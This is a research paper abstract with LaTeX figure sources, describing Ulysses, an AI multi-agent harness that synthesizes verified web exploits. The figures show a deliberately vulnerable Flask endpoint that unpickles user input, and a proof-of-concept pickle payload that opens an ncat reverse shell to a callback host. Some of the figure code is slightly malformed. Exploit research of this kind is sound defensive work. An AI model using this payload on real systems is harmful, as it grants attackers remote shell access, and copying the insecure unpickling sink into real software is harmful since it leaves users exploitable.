Ulysses: A Security Harness For Synthesizing Verifiable Web Exploits

How can an AI agent automatically discover security vulnerabilities in any software repository? Existing approaches use LLMs to generate software vulnerability exploits. However, it is challenging for an LLM to reliably verify its own generated exploits. In this paper, we propose Ulysses, a multi-agent security harness to synthesize verifiable vulnerability exploits for web applications. Ulysses converts candidate vulnerability findings into verified Proofs of Exploitability by iteratively exploring exploit hypotheses and establishing success in independently observed execution effects. We evaluated Ulysses on WebExploitGym, a curated benchmark of exploitable instances from 25 real-world web applications that span 5 languages and 7 frameworks. Ulysses produces verified proofs for 10 of 25 real-world advisories. It also discovered 4 new proofs of exploitability that have never been previously reported.

==> fig/intro_code_snip.tex <==
\begin{minted}[linenos=false,fontsize=\tiny]{python}
@app.route('/benchmark/deserialization-00/BenchmarkTest00164', methods=['POST'])
def BenchmarkTest00164_post():
    RESPONSE = ""

    param = request.form.get("BenchmarkTest00164")
    if not param:
        param = ""

    string6880 = 'help'
    string6880 += param
    string6880 += 'snapes on a plane'
    bar = string6880[4:-17]

    import pickle
    import base64
    import helpers.utils

    helpers.utils.sharedstr = "no pickles to be seen here"
\end{minted}

% Box just the vulnerable sink (split out into its own listing)
\begin{focuscode}{python}
try:
    unpickled = pickle.loads(base64.urlsafe_b64decode(bar))
except:
    RESPONSE += (
        'Unpickling failed!'
    )
    return RESPONSE
\end{focuscode}

\begin{minted}[linenos=false,fontsize=\tiny,autogobble=false]{python}
    RESPONSE += (
        f'shared string is {helpers.utils.sharedstr}'
    )
    return RESPONSE
\end{minted}


==> fig/intro_poc_patch_snip.tex <==
\begin{minted}[linenos=false,fontsize=\tiny]{python}
def generate_payload(callback_host: str, callback_port: int):
    class Exploit:
        def __reduce__(self):
            return (os.system, (f'ncat -e /bin/bash {callback_host} {callback_port}',))

    # Encode the payload with base64 URL-safe encoding
    from base64 import urlsafe_b64encode as b64ecode
    payload = b64ecode(pickle.dumps(Exploit())).decode()
    return payload

def exploit(target_url: str, payload: str) -> bool:
    # Send the malicious payload to the vulnerable endpoint.
    endpoint = f"{target_url}/benchmark/deserialization-00 BenchmarkTest00164"
    data = {"BenchmarkTest00164": payload}
    response = requests.post(endpoint, data=data, timeout=15, allow_redirects=True)

    if "Unpickling failed!" in response.text:
        print("[-] Exploit failed")
        return False
    elif "shared string is" in response.text:
        print("[+] Payload successfully deserialized!")
        return True
    else:
        print(f"[*] Response: {response.text[:200]}")
        return True

def main():
    payload = generate_payload(callback-host, 4444)
    # Exploit the vulnerability
    success = exploit(http://localhost:8080, payload)
\end{minted}

